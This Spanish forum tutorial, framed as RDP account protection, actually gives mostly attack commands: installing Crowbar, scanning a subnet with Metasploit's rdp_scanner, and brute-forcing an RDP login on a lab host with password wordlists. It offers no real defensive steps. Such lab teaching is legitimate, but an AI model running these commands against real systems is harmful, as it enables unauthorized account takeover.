Ataque a Escritorio Remoto | Así te HACKEAN | Kali Linux Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

Ataque a Escritorio Remoto | Así te HACKEAN | Kali Linux Seguridad Informática

#1

Mensaje por admin »

Te mostramos como puedes proteger tu cuenta RDP de USUARIO en WINDOWS ante ataques de piratas informáticos. Estamos hablando de RDP o Remote Desktop Protocol

Imagen
 
LABORATORIO


Imagen
 
COMANDOS PARA INSTALAR CROWAR

Código: Seleccionar todo

#sudo apt install -y crowbar
# git clone https://github.com/galkan/crowbar
# cd crowbar/
# pip3 install -r requirements.txt
Comandos para realizar el Escaneo de servicios de Remote Desktop y Puertos RDP en la red donde se cuentra el Hacker

Código: Seleccionar todo

sudo msfconsole

use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 192.168.1.0/24 | Puede ser un Host Ejemplo 192.168.1.79/32
exploit
COMANDOS EJECUTADOS en el VIDEO

Código: Seleccionar todo

## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst
## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst --v
## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst --q
COMANDOS si Instalar la Forma de ejecutar el archivo crowbar de python. Recuerden poscionarse en el director donde instalaron el paquete

Código: Seleccionar todo

cd crowbar
sudo ./crowbar.py --server 192.168.1.79/32 -b rdp -u roger -C /usr/share/nmap/nselib/data/passwords.lst
sudo ./crowbar.py -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst 
PUEDEN TENER PROBLEMAS A LA HORA de LEER el Archivo de TEXTO. Con estos comandos pueden solucionar el issue

Código: Seleccionar todo

iconv -f ISO-8859-1 -t latin-1 /usr/share/nmap/nselib/data/passwords.lst > passwords_utf8.lst

iconv -f ISO-8859-1 -t latin-1 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt

iconv -f ISO-8859-1 -t UTF-8 rockyou.txt > rockyou_utf8.txt
VIDEO TUTORIAL




 
Página Oficial de Crowbar

https://github.com/galkan/crowbar


ehtical hacking,ethical hacker,protocolo,cyber seguridad,security,install,instalar,linux,unix,brute forcing tool,penetration tests,herramienta,debian,ubuntu,synology,python,xpenology,tutorial,linux for ethical hackers,cursos,courses,capacitacion,educacion,How Hackers Do It,proteger computadoras,Information Systems Security Professional,CompTIA Security+,servers,servidores,educación,auditoria,ccna,escaneo,scanner,Detección de intrusiones en la red,vulnerabilidades,userland
 
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 5 invitados